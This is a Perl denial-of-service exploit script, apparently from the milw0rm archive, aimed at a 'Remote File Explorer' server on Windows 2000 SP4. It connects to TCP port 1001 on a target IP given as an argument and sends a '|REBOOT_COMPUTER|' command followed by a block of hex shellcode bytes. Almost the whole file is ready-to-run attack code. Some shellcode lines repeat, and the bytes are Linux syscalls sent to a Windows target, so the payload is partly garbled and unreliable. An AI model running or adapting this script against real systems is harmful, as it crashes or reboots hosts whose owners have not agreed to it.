#!/usr/local/bin/perl # # Remote File Explorer DoS Exploit # ---------------------------------------- # # Resolve host... [OK] # [+] Connecting... [OK] # Target locked # Sending bad procedure... [OK] # [+] Server DoS'ed # # Tested on Windows2000 SP4 # Info: infamous.2hell.com $ARGC=@ARGV; if ($ARGC !=1) { print "Usage: $0 \n"; print "Example: $0 127.0.0.1\n"; exit; } use Socket; my($remote,$port,$iaddr,$paddr,$proto); $remote=$ARGV[0]; $port = "1001"; # default port for the server $iaddr = inet_aton($remote) or die "Error: $!"; $paddr = sockaddr_in($port, $iaddr) or die "Error: $!"; $proto = getprotobyname('tcp') or die "Error: $!"; socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!"; connect(SOCK, $paddr) or die "Error: $!"; $sploit = "|REBOOT_COMPUTER|". "\xeb\x6e\x5e\x29\xc0\x89\x46\x10". "\x40\x89\xc3\x89\x46\x0c\x40\x89". "\x46\x08\x8d\x4e\x08\xb0\x66\xcd". "\x40\x89\xc3\x89\x46\x0c\x40\x89". "\x46\x08\x8d\x4e\x08\xb0\x66\xcd". "\x80\x43\xc6\x46\x10\x10\x88\x46". "\x08\x31\xc0\x31\xd2\x89\x46\x18". "\xb0\x90\x66\x89\x46\x16\x8d\x4e". "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0". "\x66\xcd\x80\x89\x5e\x0c\x43\x43". "\xb0\x66\xcd\x80\x89\x56\x0c\x89". "\x08\x31\xc0\x31\xd2\x89\x46\x18". "\xb0\x90\x66\x89\x46\x16\x8d\x4e". "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0". "\x56\x10\xb0\x66\x43\xcd\x80\x86". "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0". "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0". "\x66\xcd\x80\x89\x5e\x0c\x43\x43". "\xb0\x66\xcd\x80\x89\x56\x0c\x89". "\x56\x10\xb0\x66\x43\xcd\x80\x86". "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0". "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd". "\x80\x88\x56\x07\x89\x76\x0c\x87". "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80". "\xe8\x8d\xff\xff"; $msg = $sploit; print $msg; send(SOCK, $msg, 0) or die "Cannot send query: $!"; sleep(1); close(SOCK); exit; # milw0rm.com [2005-07-11]